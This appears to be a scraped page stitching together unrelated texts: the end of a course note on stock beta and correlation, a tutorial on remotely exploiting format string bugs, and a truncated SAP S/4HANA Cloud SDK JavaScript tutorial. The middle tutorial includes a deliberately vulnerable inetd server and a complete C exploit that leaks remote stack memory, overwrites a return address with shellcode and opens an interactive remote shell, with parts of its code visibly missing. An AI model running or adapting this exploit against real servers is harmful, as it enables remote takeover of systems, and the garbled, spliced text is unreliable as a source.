plt.plot(daily_returns['SPY'], beta_XOM * daily_returns['SPY'] + alpha_XOM, '-', color='r')
Note that we include the last two parameters to get a red line plot.
Let's look at the best-fit line.
If we print out the alpha and beta values for the XOM line and the GLD line, we see the following.
Remember that the beta value shows how a stock moves with respect to SPY. We can see that the beta value for XOM is greater than that for GLD, which means that XOM is more reactive to the market than GLD.
Remember also that the alpha value shows how well a stock performs with respect to SPY. We can see that the alpha value for GLD is higher than that for XOM, which indicates that GLD performs better, relative to SPY, than XOM.
The following graph of prices confirms that GLD outperforms SPY, and SPY outperforms XOM.
Finally, we can find the correlation between the daily returns of SPY, XOM, and GLD with one method call:
daily_returns.corr(method='pearson')
We can specify the method by which we want to calculate the correlation. We choose Pearson, the most common method.
If we print out the correlation, we see the following table.
We can see that SPY and XOM are highly correlated, while SPY and GLD have a very low correlation.
Let's check the SPY vs. GLD scatterplot and best-fit line to verify.
Indeed, we see that the data points do not fit the line tightly.
In many cases, in financial research, we assume that returns are normally distributed. This assumption can be dangerous because it ignores kurtosis, the probabilities that lie in the tails.
In the early 2000s, investment banks built bonds based on mortgages. They assumed that the distribution of returns for these mortgages was normally distributed. On that basis, they were able to show that these bonds had a very low probability of default.
They made two mistakes, however. First, they assumed that the return of each of these mortgages was independent and, second, that this return would be normally distributed.
Both of these assumptions proved to be wrong as massive numbers of homeowners defaulted on their mortgages. It was these defaults that precipitated the Great Recession of 2008.
OMSCS Notes is made with in NYC by Matt Schlenker.
|
https://www.omscs.io/machine-learning-trading/histograms-scatter-plots/
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
How to Remotely Exploit Format String Bugs - A practical tutorial. Includes info on guessing the offset, guessing the address of the shellcode in the stack, using format string bugs as debuggers, examples, etc.
c323add4e7a0e2f2f14ec27d9d50002992564b1d0be3d391722da88350a25a83
Howto remotely and automatically exploit a format bug
Frédéric Raynal <pappy@miscmag.com>
Exploiting a format bug remotely can be something very funny. It
allows to very well understand the risks associated to this kind of
bugs. We won't explain here the basis for this vulnerability (i.e. its
origin or the building of the format string) since there are already
lots of articles available (see the bibliography at the end).
--[ 1. Context : the vulnerable server ]--
We will use very minimalist server (but nevertheless pedagogic) along
this paper. It requests a login and password, then it echoes its
inputs. Its code is available in appendix 1.
To install the fmtd server, you'll have to configure inetd so that
connections to port 12345 are allowed:
# /etc/inetd.conf
12345 stream tcp nowait raynal /home/raynal/MISC/2-MISC/RemoteFMT/fmtd
Or with xinetd:
# /etc/xinetd.conf
service fmtd
{
type = UNLISTED
user = raynal
group = users
socket_type = stream
protocol = tcp
wait = no
server = /tmp/fmtd
port = 12345
only_from = 192.168.1.1 192.168.1.2 127.0.0.1
}
Then restart your server. Don't forget to change the rules of your
firewall if you are using one.
Now, let's see how this server is working:
$ telnet bosley 12345
Trying 192.168.1.2...
Connected to bosley.
Escape character is '^]'.
login: raynal
password: secret
hello world
hello world
^]
telnet> quit
Connection closed.
Let's have a look at the log file:
Jan 4 10:49:09 bosley fmtd[877]: login -> read login [raynal^M ] (8) bytes
Jan 4 10:49:14 bosley fmtd[877]: passwd -> read passwd [bffff9d0] (8) bytes
Jan 4 10:49:56 bosley fmtd[877]: vul() -> error while reading input buf [] (0)
Jan 4 10:49:56 bosley inetd[407]: pid 877: exit status 255
During the previous example, we simply enter a login, a password and a
sentence before closing the connexion. But what happens when we feed
the server with format instructions:
telnet bosley 12345
Trying 192.168.1.2...
Connected to bosley.
Escape character is '^]'.
login: raynal
password: secret
%x %x %x %x
d 25207825 78252078 d782520
The instructions "%x %x %x %x" being executed, it shows that our
server is vulnerable to a format bug.
<off topic>
In fact, all programs acting like that are not vulnerable to a
format bug:
int main( int argc, char ** argv )
{
char buf[8];
sprintf( buf, argv[1] );
}
Using %hn to exploit this leads to an overflow: the formatted
string is getting greater and greater, but since no control is
performed on its length, an overflow occurs.
</off topic>
Looking at the sources reveals that the troubles come from vul()
function:
...
snprintf(tmp, sizeof(tmp)-1, buf);
...
since the buffer <buf> is directly available to a malicious user, the
latter is allowed to take control of the server ... and thus gain a
shell with the privileges of the server.
--[ 2. Requested parameters ]--
The same parameters as a local format bug are requested here:
* the offset to reach the beginning of the buffer ;
* the address of a shellcode placed somewhere is the server's memory ;
* the address of the vulnerable buffer ;
* a return address.
The exploit is provided as example in annexe 2. The following parts of
this article explain how it was designed.
Here are some variables used in the exploit:
* sd : the socket between client (exploit) and the vulnerable server ;
* buf : a buffer to read/write some data ;
* read_at : an address in the server's stack ;
* fmt : format string sent to the server.
--[ 2.1 Guessing the offset ]--
This parameter is always necessary for the exploitation of this kind of
bug, and its determination works in the same way as with a local
exploitation:
telnet bosley 12345
Trying 192.168.1.2...
Connected to bosley.
Escape character is '^]'.
login: raynal
password: secret
AAAA%1$x
AAAAa
AAAA%2$x
AAAA41414141
Here, the offset is 2. It is very easy to guess it automatically, and
that is what the function get_offset() aims at. It sends the string
"AAAA%<val>$x" to the server. If the offset is <val>, then the server
answers with the string "AAAA41414141" :
#define MAXOFFSET 255
for (i = 1; i<MAX_OFFSET && offset == -1; i++) {
snprintf(fmt, sizeof(fmt), "AAAA%%%d$x", i);
write(sock, fmt, strlen(fmt));
memset(buf, 0, sizeof(buf));
sleep(1);
read(sock, buf, sizeof(buf))
if (!strcmp(buf, "AAAA41414141"))
offset = i;
}
--[ 2.2 Guessing the address of the shellcode in the stack ]--
If one has to place a shellcode in the memory of the server, it then
has to guess its address. It can be placed in the vulnerable buffer,
or in any other place: we don't care due to format bug :) For
instance, some ftp servers allowed to store it in the password (PASS),
without not too many checks for anonymous or ftp account. Here, our
server works that way.
-- --[ Making a format bug a debugger ]-- --
We aim at finding the address of the shellcode placed in the memory of
the server. So, we will transform the remote server in remote debugger !
Using the format string "%s", one is allowed to read until the buffer
is full or a NULL character is met. So, by sending successively "%s"
to the server, the exploit is able to dump locally the memory of the
remote process:
<addr>%<offset>$s
In the exploit, it is performed in 2 steps:
1. The function get_addr_as_char(u_int addr, char *buf) converts
addr into char :
*(u_int*)buf = addr;
2. then, the next 4 bytes contains the format instruction.
The format string is then sent to the remote server:
get_addr_as_char(read_at, fmt);
snprintf(fmt+4, sizeof(fmt)-4, "%%%d$s", offset);
write(sd, fmt, strlen(fmt));
The client reads a string at <addr>. If it contains no shellcode, the
next reading is performed at this same address, to which one adds the
amount of read bytes (i.e. the return value of read()).
However, all the <len> read characters should not be considered. The
vulnerable instruction on the server is something like:
sprintf(out, in);
To build the out buffer, sprintf() starts by parsing the <in>
string. The first four bytes are the address we intend to read at: they
are simply copied to the output buffer. Then, a format instruction is
met and interpreted. Hence, we have to remove these 4 bytes:
while( (len = read(sd, buf, sizeof(buf))) > 0) {
[ ... ]
read_at += (len-4+1);
[ ... ]
}
-- --[ What to look for ? ]-- --
Another problem is how to identify the shellcode in memory. If one
just looks for all its bytes in the remote memory, there is a risk to
miss it. Since the buffer is ended by a NULL byte, the string placed
just before can contain lots of NOPs. Hence the reading of the
shellcode can be split among 2 readings.
To avoid this, if the amount of read characters is equal to the size
of the buffer, the exploit "forgets" the last sizeof(shellcode) bytes
read from the server. Thus, the next reading is performed at:
while( (len = read(sd, buf, sizeof(buf))) > 0) {
[ ... ]
read_at += len;
if (len == sizeof(buf))
read_at-=strlen(shellcode);
[ ... ]
}
This case has never been tested ... so I don't guarantee it works ;-/
-- --[ Guessing the exact address of the shellcode ]-- --
Pattern matching in a string is performed by the function:
ptr = strstr(buf, pattern);
It returns a pointer to the parsed string addressing the first byte of
the searched pattern. Thus, the position of the shellcode is:
addr_shellcode = read_at + (ptr-buf);
Except that the buffer contains bytes we need to ignore !!! As we have
previously noticed while exploring the stack, the first four bytes of
the output buffer are in fact the address we just read at:
addr_shellcode = read_at + (ptr-buf) - 4;
-- --[ shellcode : a summary ]-- --
Sometimes, some code is worthier than long explanations:
while( (len = read(sd, buf, sizeof(buf))) > 0) {
if ((ptr = strstr(buf, shellcode))) {
addr_shellcode = read_at + (ptr-buf) - 4;
break;
}
read_at += (len-4+1);
if (len == sizeof(buf)) {
read_at-=strlen(shellcode);
}
memset (buf, 0x0, sizeof (buf));
get_addr_as_char(read_at, fmt);
write(sd, fmt, strlen(fmt));
}
--[ 2.3 Guessing the return address ]--
The last (but not the least) parameter to determine is the return
address. We need to find a valid return address in the remote process
stack to overwrite it with the one of the shellcode.
We won't explain here how the functions are called in C, but simply
remind how variables and parameters are placed in the stack. Firstly
the arguments are placed in the stack from the last one (upper) to the
first one (most down). Then, instructions registers (%eip) is saved on
the stack, followed by the base pointer register (%ebp) which
indicates the beginning of the memory for the current function. After
this address, the memory is used for the local variables. When the
function ends, %eip is popped and clean up is made on the stack. This
just means that the registers %esp and %ebp are popped according to
the calling function. The stack is not cleaned up in any way.
So, our goal is to find a place where the register %eip is saved. Two
steps are used:
1. find the address of the input buffer
2. find the return address of the function the vulnerable buffer
belongs to.
Why do we need to look for the address of the buffer ? All pairs
(saved ebp, saved eip) that we could find in the stack are not good
for our purpose. The stack is never really cleaned up between
different calls. So it contains values used for previous calls, even
if they won't really be used by the process.
Thus, by firstly guessing the address of the vulnerable buffer, we
have a point above which all pairs (saved ebp, saved eip) are valid
since the vulnerable buffer is itself on the top of the stack :)
-- --[ Guessing the address of the buffer ]-- --
The input buffer is easily identified in the remote memory: it is a
mirror for the characters we feed it with. The server fmtd copies them
without any modification (Warning: if some characters were placed by
the server before its answer, they should be considered).
So, we simply have to look at the exact copy of our format string in
the server's memory:
while((len = read(sd, buf, sizeof(buf))) > 0) {
if ((ptr = strstr(buf, fmt))) {
addr_buffer = read_at + (ptr-buf) - 4;
break;
}
read_at += (len-4+1);
memset (buf, 0x0, sizeof (buf));
get_addr_as_char(read_at, fmt);
write(sd, fmt, strlen(fmt));
}
-- --[ Guessing the return address ]-- --
On most of the Linux distributions, the top of the stack is at
0xc0000000. This is not true for all the distributions: Caldera put it
at 0x80000000 (BTW, if someone can explain me why ?). The space
reserved in it depends on the needs of the program (mainly local
variables). These are usually placed in the range 0xbfffXXXX, where <XX>
is an undefined byte. On the contrary, the instruction of the process
(.text section) are loaded from 0x08048000.
So, we have to read the remote stack to find something that looks
like:
Top of the stack
0x0804XXXX
0xbfffXXXX
Due to little endian, this is equivalent to looking for the string
0xff 0xbf XX XX 0x04 0x08. As we have seen, we don't have to consider
the first 4 bytes of the returned string:++;
}
if (addr_ret != -1) break;
The variable <addr_ret> is initialized with a very complex formula:
* addr_ret : the address we just read ;
* +i : the offset in the string we are looking for the pattern (we
can't use strstr() since our pattern has wildcards - undefined
bytes XX) ;
* -2 : the first bytes we discover in the stack are ff bf, but
he full word (i.e. saved %ebp) is written on 4 bytes. The -2
is for the 2 "least bytes" placed at the beginning of the word XX
XX ff bf ;
* +4 : this modification is due to the return address which is 4
bytes above the saved %ebp ;
* -4 : as you should be used to now, the first 4 bytes which are a
copy of the read address.
--[ 3. Exploitation ]--
So, since we now have all the requested parameters, the exploitation
in itself is not very difficult. We just have to replace the return
address of the vulnerable function (addr_ret) with the one of the
shellcode (addr_shellcode). The function fmtbuilder is taken from [5]
and build the format string sent to the server:
build_hn(buf, addr_ret, addr_shellcode, offset, 0);
write(sd, buf, strlen(buf));
Once the replacement is performed in the remote stack, we just have to
return from the vul() function. We then send the "quit" command
specially intended to that ;-)
strcpy(buf, "quit");
write(sd, buf, strlen(buf));
Lastly, the function interact() plays with the file descriptors to
allow us to use the gained shell.
In the next example, the exploit is started from bosley to charly :
$ ./expl-fmtd -i 192.168.1.1 -a 0xbfffed01
Using IP 192.168.1.1
Connected to 192.168.1.1
login sent [toto] (4)
passwd (shellcode) sent (10)
[Found offset = 6]
[buffer addr is: 0xbfffede0 (12) ]
buf = (12)
e0 ed ff bf e0 ed ff bf 25 36 24 73
[shell addr is: 0xbffff5f0 (60) ]
buf = (60)
e5 f5 ff bf 8b 04 08 28 fa ff bf 22 89 04 08 ff 2f 62 69 6e 2f 73 68
[ret addr is: 0xbffff5ec (60) ]
Building format string ...
Sending the quit ...
bye bye ...
Linux charly 2.4.17 #1 Mon Dec 31 09:40:49 CET 2001 i686 unknown
uid=500(raynal) gid=100(users)
exit
$
--[ 4. Conclusion ]--
Less format bugs are discovered ... fortunately. As we just saw, the
automation is not very difficult. The library fmtbuilmder (see the
bibliography) also provides the necessary tools for that.
Here, the exploit starts its reading of the remote memory to an
arbitrary value. But if it is too low, the server crashes. The exploit
can be modified to explore the stack from the top to the bottom... but
the strategies used to identify some values have then to be slightly
adapted. The difficulty seems a bit greater.
The reading then starts from the top of the stack 0xc0000000-4. One
have to change the value of the variable addr_stack. Moreover, the
line read_at+=(len-4+1); have to be replaced with read_at-=4; In this
way, the argument -a is useless.
The disadvantage of this solution is that the return address is below
the input buffer. But all that is below this buffer comes from
function that are no more in the stack: these data are written in a
free region of the stack, so they can be modified at any time by the
process. So, the search of the return address has to be change
(several can be found above the vulnerable buffer ... but we can't
control whether they will be really used).
--[ Greetings ]--
Denis Ducamp and Renaud Deraison for their comments/fixes.
------------------------------------------------------------------------
--[ Appendix 1 : the server side fmtd ]--
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <unistd.h>
#include <stdarg.h>
#include <syslog.h>
void respond(char *fmt,...);
int vul(void)
{
char tmp[1024];
char buf[1024];
int len = 0;
syslog(LOG_ERR, "vul() -> tmp = 0x%x buf = 0x%x\n", tmp, buf);
while(1) {
memset(buf, 0, sizeof(buf));
memset(tmp, 0, sizeof(tmp));
if ( (len = read(0, buf, sizeof(buf))) <= 0 ) {
syslog(LOG_ERR, "vul() -> error while reading input buf [%s] (%d)",
buf, len);
exit(-1);
} /*
else
syslog(LOG_INFO, "vul() -> read %d bytes", len);
*/
if (!strncmp(buf, "quit", 4)) {
respond("bye bye ...\n");
return 0;
}
snprintf(tmp, sizeof(tmp)-1, buf);
respond("%s", tmp);
}
}
void respond(char *fmt,...)
{
va_list va;
char buf[1024];
int len = 0;
va_start(va,fmt);
vsnprintf(buf,sizeof(buf),fmt,va);
va_end(va);
len = write(STDOUT_FILENO,buf,strlen(buf));
/* syslog(LOG_INFO, "respond() -> write %d bytes", len); */
}
int main()
{
struct sockaddr_in sin;
int i,len = sizeof(struct sockaddr_in);
char login[16];
char passwd[1024];
openlog("fmtd", LOG_NDELAY | LOG_PID, LOG_LOCAL0);
/* get login */
memset(login, 0, sizeof(login));
respond("login: ");
if ( (len = read(0, login, sizeof(login))) <= 0 ) {
syslog(LOG_ERR, "login -> error while reading login [%s] (%d)",
login, len);
exit(-1);
} else
syslog(LOG_INFO, "login -> read login [%s] (%d) bytes", login, len);
/* get passwd */
memset(passwd, 0, sizeof(passwd));
respond("password: ");
if ( (len = read(0, passwd, sizeof(passwd))) <= 0 ) {
syslog(LOG_ERR, "passwd -> error while reading passwd [%s] (%d)",
passwd, len);
exit(-1);
} else
syslog(LOG_INFO, "passwd -> read passwd [%x] (%d) bytes", passwd, len);
/* let's run ... */
vul();
return 0;
}
------------------------------------------------------------------------
--[ Appendix 2 : the exploit side expl-fmtd ]--
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <getopt.h>
char verbose = 0, debug = 0;
#define OCT( b0, b1, b2, b3, addr, str ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> 8) & 0xff; \
b3 = (addr ) & 0xff; \
if ( b0 * b1 * b2 * b3 == 0 ) { \
printf( "\n%s contains a NUL byte. Leaving...\n", str ); \
exit( EXIT_FAILURE ); \
} \
}
#define MAX_FMT_LENGTH 128
#define ADD 0x100
#define FOUR sizeof( size_t ) * 4
#define TWO sizeof( size_t ) * 2
#define BANNER "uname -a ; id"
#define MAX_OFFSET 255
int interact(int sock)
{
fd_set fds;
ssize_t ssize;
char buffer[1024];
write(sock, BANNER"\n", sizeof(BANNER));
while (1) {
FD_ZERO(&fds);
FD_SET(STDIN_FILENO, &fds);
FD_SET(sock, &fds);
select(sock + 1, &fds, NULL, NULL, NULL);
if (FD_ISSET(STDIN_FILENO, &fds)) {
ssize = read(STDIN_FILENO, buffer, sizeof(buffer));
if (ssize < 0) {
return(-1);
}
if (ssize == 0) {
return(0);
}
write(sock, buffer, ssize);
}
if (FD_ISSET(sock, &fds)) {
ssize = read(sock, buffer, sizeof(buffer));
if (ssize < 0) {
return(-1);
}
if (ssize == 0) {
return(0);
}
write(STDOUT_FILENO, buffer, ssize);
}
}
return(-1);
}
u_long resolve(char *host)
{
struct hostent *he;
u_long ret;
if(!(he = gethostbyname(host)))
{
herror("gethostbyname()");
exit(-1);
}
memcpy(&ret, he->h_addr, sizeof(he->h_addr));
return ret;
}
int
build_hn(char * buf, unsigned int locaddr, unsigned int retaddr, unsigned int offset, unsigned int base)
{
unsigned char b0, b1, b2, b3;
unsigned int high, low;
int start = ((base / (ADD * ADD)) + 1) * ADD * ADD;
int sz;
/* <locaddr> : where to overwrite */
OCT(b0, b1, b2, b3, locaddr, "[ locaddr ]");
sz = snprintf(buf, TWO + 1, /* 8 char to have the 2 addresses */
"%c%c%c%c" /* + 1 for the ending \0 */
"%c%c%c%c",
b3, b2, b1, b0,
b3 + 2, b2, b1, b0);
/* where is our shellcode ? */
OCT(b0, b1, b2, b3, retaddr, "[ retaddr ]");
high = (retaddr & 0xffff0000) >> 16;
low = retaddr & 0x0000ffff;
return snprintf(buf + sz, MAX_FMT_LENGTH,
"%%.%hdx%%%d$n%%.%hdx%%%d$hn",
low - TWO + start - base,
offset,
high - low + start,
offset + 1);
}
void get_addr_as_char(u_int addr, char *buf) {
*(u_int*)buf = addr;
if (!buf[0]) buf[0]++;
if (!buf[1]) buf[1]++;
if (!buf[2]) buf[2]++;
if (!buf[3]) buf[3]++;
}
int get_offset(int sock) {
int i, offset = -1, len;
char fmt[128], buf[128];
for (i = 1; i<MAX_OFFSET && offset == -1; i++) {
snprintf(fmt, sizeof(fmt), "AAAA%%%d$x", i);
write(sock, fmt, strlen(fmt));
memset(buf, 0, sizeof(buf));
sleep(1);
if ((len = read(sock, buf, sizeof(buf))) < 0) {
fprintf(stderr, "Error while looking for the offset (%d)\n", len);
close(sock);
exit(EXIT_FAILURE);
}
if (debug)
fprintf(stderr, "testing offset = %d fmt = [%s] buf = [%s] len = %d\n",
i, fmt, buf, len);
if (!strcmp(buf, "AAAA41414141"))
offset = i;
}
return offset;
} *ip = "127.0.0.1", *ptr;
struct sockaddr_in sck;
u_int read_at, addr_stack = (u_int)0xbfffe0001; /* default bottom */
u_int addr_shellcode = -1, addr_buffer = -1, addr_ret = -1;
char buf[1024], fmt[128], c;
int port = 12345, offset = -1;
int sd, len, i;
while ((c = getopt(argc, argv, "dvi:p:a:o:")) != -1) {
switch (c) {
case 'i':
ip = optarg;
break;
case 'p':
port = atoi(optarg);
break;
case 'a':
addr_stack = strtoul(optarg, NULL, 16);
break;
case 'o':
offset = atoi(optarg);
break;
case 'v':
verbose = 1;
break;
case 'd':
debug = 1;
break;
default:
fprintf(stderr, "Unknwon option %c (%d)\n", c, c);
exit (EXIT_FAILURE);
}
}
/* init the sockaddr_in */
fprintf(stderr, "Using IP %s\n", ip);
sck.sin_family = PF_INET;
sck.sin_addr.s_addr = resolve(ip);
sck.sin_port = htons (port);
/* open the socket */
if (!(sd = socket (PF_INET, SOCK_STREAM, 0))) {
perror ("socket()");
exit (EXIT_FAILURE);
}
/* connect to the remote server */
if (connect (sd, (struct sockaddr *) &sck, sizeof (sck)) < 0) {
perror ("Connect() ");
exit (EXIT_FAILURE);
}
fprintf (stderr, "Connected to %s\n", ip);
if (debug) sleep(10);
/* send login */
memset (buf, 0x0, sizeof(buf));
len = read(sd, buf, sizeof(buf));
if (strncmp(buf, "login", 5)) {
fprintf(stderr, "Error: no login asked [%s] (%d)\n", buf, len);
close(sd);
exit(EXIT_FAILURE);
}
strcpy(buf, "toto");
len = write (sd, buf, strlen(buf));
if (verbose) fprintf(stderr, "login sent [%s] (%d)\n", buf, len);
sleep(1);
/* passwd: shellcode in the buffer and in the remote stack */
len = read(sd, buf, sizeof(buf));
if (strncmp(buf, "password", 8)) {
fprintf(stderr, "Error: no password asked [%s] (%d)\n", buf, len);
close(sd);
exit(EXIT_FAILURE);
}
write (sd, shellcode, strlen(shellcode));
if (verbose) fprintf (stderr, "passwd (shellcode) sent (%d)\n", len);
sleep(1);
/* find offset */
if (offset == -1) {
if ((offset = get_offset(sd)) == -1) {
fprintf(stderr, "Error: can't find offset\n");
fprintf(stderr, "Please, use the -o arg to specify it.\n");
close(sd);
exit(EXIT_FAILURE);
}
if (verbose) fprintf(stderr, "[Found offset = %d]\n", offset);
}
/* look for the address of the shellcode in the remote stack */
memset (fmt, 0x0, sizeof(fmt));
read_at = addr_stack;
get_addr_as_char(read_at, fmt);
snprintf(fmt+4, sizeof(fmt)-4, "%%%d$s", offset);
write(sd, fmt, strlen(fmt));
sleep(1);
while((len = read(sd, buf, sizeof(buf))) > 0 &&
(addr_shellcode == -1 || addr_buffer == -1 || addr_ret == -1) ) {
if (debug) fprintf(stderr, "Read at 0x%x (%d)\n", read_at, len);
/* the shellcode */
if ((ptr = strstr(buf, shellcode))) {
addr_shellcode = read_at + (ptr-buf) - 4;
fprintf (stderr, "[shell addr is: 0x%x (%d) ]\n", addr_shellcode, len);
fprintf(stderr, "buf = (%d)\n", len);
for (i=0; i<len; i++) {
fprintf(stderr,"%.2x ", (int)(buf[i] & 0xff));
if (i && i%20 == 0) fprintf(stderr, "\n");
}
fprintf(stderr, "\n");
}
/* the input buffer */
if (addr_buffer == -1 && (ptr = strstr(buf, fmt))) {
addr_buffer = read_at + (ptr-buf) - 4;
fprintf (stderr, "[buffer addr is: 0x%x (%d) ]\n", addr_buffer, len);
fprintf(stderr, "buf = (%d)\n", len);
for (i=0; i<len; i++) {
fprintf(stderr,"%.2x ", (int)(buf[i] & 0xff));
if (i && i%20 == 0) fprintf(stderr, "\n");
}
fprintf(stderr, "\n\n");
}
/* return address */
if (addr_buffer != -1) {++;
}
}
read_at += (len-4+1);
if (len == sizeof(buf)) {
fprintf(stderr, "Warning: this has not been tested !!!\n");
fprintf(stderr, "len = %d\nread_at = 0x%x", len, read_at);
read_at-=strlen(shellcode);
}
get_addr_as_char(read_at, fmt);
write(sd, fmt, strlen(fmt));
}
/* send the format string */
fprintf (stderr, "Building format string ...\n");
memset(buf, 0, sizeof(buf));
build_hn(buf, addr_ret, addr_shellcode, offset, 0);
write(sd, buf, strlen(buf));
sleep(1);
read(sd, buf, sizeof(buf));
/* call the return while quiting */
fprintf (stderr, "Sending the quit ...\n");
strcpy(buf, "quit");
write(sd, buf, strlen(buf));
sleep(1);
interact(sd);
close(sd);
return 0;
}
------------------------------------------------------------------------
--[ Bibliography ]--
1. More info on format bugs par P. "kalou" Bouchareine
()
2. Format Bugs: What are they, Where did they come from,... How to
exploit them par lamagra
(lamagra@digibel.org <lamagra@digibel.org>)
3. Éviter les failles de sécurité dès le développement d'une
application - 4 : les chaînes de format par F. Raynal, C.
Grenier, C. Blaess
( ou)
4. Exploiting the format string vulnerabilities par scut (team TESO)
()
5. fmtbuilder-howto par F. Raynal et S. Dralet
()
------------------------------------------------------------------------
Frédéric Raynal - <pappy@miscmag.com>
|
https://packetstormsecurity.com/files/25978/remotefmt-howto.txt.html
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
Technical Articles
Writing an Example Application using the SAP S/4HANA Cloud SDK for JavaScript (Beta)
As you may have seen in our announcement blog post, we have released the SAP S/4HANA Cloud SDK for JavaScript (beta)! In time for TechEd Las Vegas we bring the benefits of the SAP S/4HANA Cloud SDK also to anyone developing in JavaScript or TypeScript.
This blog post is part of a bigger series about extending SAP S/4HANA using the SAP S/4HANA Cloud SDK. You can find the full series here.
Goal of this blog post
The goal of this blog post is to enable you to build your own SAP S/4HANA side-by-side extensions application in JavaScript using the SAP S/4HANA Cloud SDK for JavaScript. In this tutorial, we will cover the following steps:
- Prerequisites
- Downloading the JS SDK.
- Setting up an application using Express.js
- Installing the SDK to your application.
- Building an example service that retrieves data from the SAP S/4HANA system.
- Deploying your application to SAP Cloud Platform Cloud Foundry
Please note: the SAP S/4HANA Cloud SDK is available as beta. It is not meant for productive use, and SAP does not make any guarantee about releasing a productive version. Any API and functionality may change without notice.
Prerequisites
Access to the beta requires you to be an SAP customer and sign a Test and Evaluation Agreement (TEA). We have described the process in the announcement blog post.
In order to complete this tutorial, you will need to install Node.js on your machine. If you have not used Node.js before, you can either grab the latest executable from the official Node.js website, or install it using your package manager of choice.
Furthermore, you should have access to SAP Cloud Platform Cloud Foundry and an SAP S/4HANA Cloud system. If you do not have access to Cloud Foundry, you can create a trial account. Additionally, we recommend using the command line tools for CloudFoundry (
cf CLI). Installation instructions can be found in the CloudFoundry documentation.
In case you don’t have access to an SAP S/4HANA Cloud system, for the scope of this tutorial you can also use our mock server, that provides an exemplary OData business partner service.
One final disclaimer: While the SDK is fully compatible with pure JavaScript, it is written in and designed for TypeScript. TypeScript is a superset of ECMAScript 6, adding an optional but powerful type system to JavaScript. If you are not familiar with TypeScript, we highly recommend checking it out!
Download the SDK
Since the SDK is a beta version, you currently cannot get it from the NPM registry. Instead, after signing in the TEA as described in the separate blog post, visit SAP’s Service Marketplace and download the SDK there. Save the SDK to a directory of your choice. The downloaded file will be a .tgz, so go ahead and unzip the archive. That’s all for downloading! We will come back to the SDK after setting up our application.
Setting up an Application using Express.js
Now we will setup our application. We use Express.js to build a backend application exposing RESTful APIs. In this section, we will set up the plain application as you would do with any Node.js application, still without any integration to SAP S/4HANA.
Start by creating a directory
example-app. In this directory, create a
package.json file with the following content:
{ "name": "example-app", "version": "1.0.0", "description": "Example application using the SAP S/4HANA Cloud SDK for JavaScript.", "scripts": { "start": "ts-node src/server.ts" }, "dependencies": { "express": "^4.16.3" }, "devDependencies": { "ts-node": "^7.0.1", "typescript": "^3.0.3" } }
The
package.json acts as a project descriptor used by
npm, the Node.js package manager.
Proceed by entering the
example-app directory in your terminal and call
npm install. This will install the necessary dependencies for our application.
Additionally, since this is a TypeScript project, create another file called
tsconfig.json with the following content:
{ "typeAcquisition": { "enable": true } }
Now create a directory
src inside your
example-app and add two files: First,
server.ts, that will contain the logic for starting the webserver.
import app from './application'; const port = 8080; app.listen(port, () => { console.log('Express server listening on port ' + port); });
Secondly,
application.ts, that contains the logic and routes of our application.
import * as bodyParser from 'body-parser'; import * as express from 'express'; import { Request, Response } from 'express'; class App { public app: express.Application; constructor() { this.app = express(); this.config(); this.routes(); } private config(): void { this.app.use(bodyParser.json()); this.app.use(bodyParser.urlencoded({ extended: false })); } private routes(): void { const router = express.Router(); router.get('/', (req: Request, res: Response) => { res.status(200).send('Hello, World!'); }); this.app.use('/', router); } } export default new App().app;
The most important part in this file is the following, where we define our first API in the
routes function:
router.get('/', (req: Request, res: Response) => { res.status(200).send('Hello, World!'); });
This instructs the router to respond to HTTP GET requests (
router.get) on the root path of the application (
'/', the first parameter) by calling the function provided as the second parameter. In this function, we simply send a response with status code 200 and
'Hello, World!' as body.
In order to start your server, return to your terminal and execute
npm start. This will in turn execute the command we have defined for
start in the
scripts section of our
package.json.
"scripts": { "start": "ts-node src/server.ts" }
After calling
npm start, you should see the following output in your terminal:
Express server listening on port 8080. Now you can visit in your browser, and you will be greeted with
Hello, World! in response!
To stop the server, press Ctrl+C or Cmd+C.
Adding the SDK to your project
Now it’s finally time to add the SDK to the project. In a previous step, we downloaded the SDK as a
.tgz archive and unpacked it, which gave us a directory called
s4sdk. Now we need to copy this directory into the
example-app directory. Then, we can add the SDK as a dependency to our application by adding two entries to the
dependencies section of our
package.json so that this section looks as follows (don’t forget to add a comma behind the second line):
"dependencies": { "express": "^4.16.3", "s4sdk-core": "file:s4sdk/s4sdk-core", "s4sdk-vdm": "file:s4sdk/s4sdk-vdm" }
The
file: prefix instructs npm to install the dependencies from your machine instead of fetching them from the npm registry.
Your project directory should now look as follows:
Call
npm install again to install the SDK to your project. In a development environment such as Visual Studio Code, this will also make available the types of the SAP S/4HANA Cloud SDK for code completion.
Now that we can use the SDK, let’s write an API endpoint that fetches business partners from your SAP S/4HANA Cloud system.
To do so, we will add another route in the
routes function in
application.ts.
import { BusinessPartner } from 's4sdk-vdm/business-partner-service'; router.get('/businesspartners', (req: Request, res: Response) => { BusinessPartner.requestBuilder() .getAll() .top(100) .execute() .then((businessPartners: BusinessPartner[]) => { res.status(200).send(businessPartners); }); });
When using a modern editor like Visual Studio Code, the correct imports should be automatically suggested to you. If this fails for whatever reason, add the following line to the import declarations:
import { BusinessPartner } from 's4sdk-vdm/business-partner-service';
Let’s go through the function step by step:
First, we define a new route that matches on GET requests on
/businesspartners. Then, we use the SDK’s Virtual Data Model (VDM) to retrieve business partners from our SAP S/4HANA Cloud system. The VDM, originally introduced in the SAP S/4HANA Cloud SDK for Java, allows you to query OData services exposed by your SAP S/4HANA Cloud system in a type-safe, fluent and explorative way. More details can be found in this blog post introducing the VDM in the SDK for Java.
We start by creating a request builder on our desired entity, in this case by calling
BusinessPartner.requestBuilder(). This in turn will offer you a function for each operation that you can perform on the respective entity. In the case of business partners, the possible operations are
getAll(),
getByKey(),
create() and
update(). We choose
getAll(), since we want to retrieve a list of business partners. Now we can choose from the variety of options to further refine our query, such as
select() and
filter(). However, for now we keep it simple by only calling
top(100) to restrict the query to the first 100 results. Finally, we call
execute(). The SDK takes care of the low level infrastructure code of the request.
By default, any call to an SAP S/4HANA system performed using the VDM will be done asynchronously and returns a promise. We handle the promise by calling
then() and providing it with a function that handles the query result. As you can see from the signature of the callback function, promises returned by the VDM are automatically typed with the respective entity, in this case we get an array of business partners (
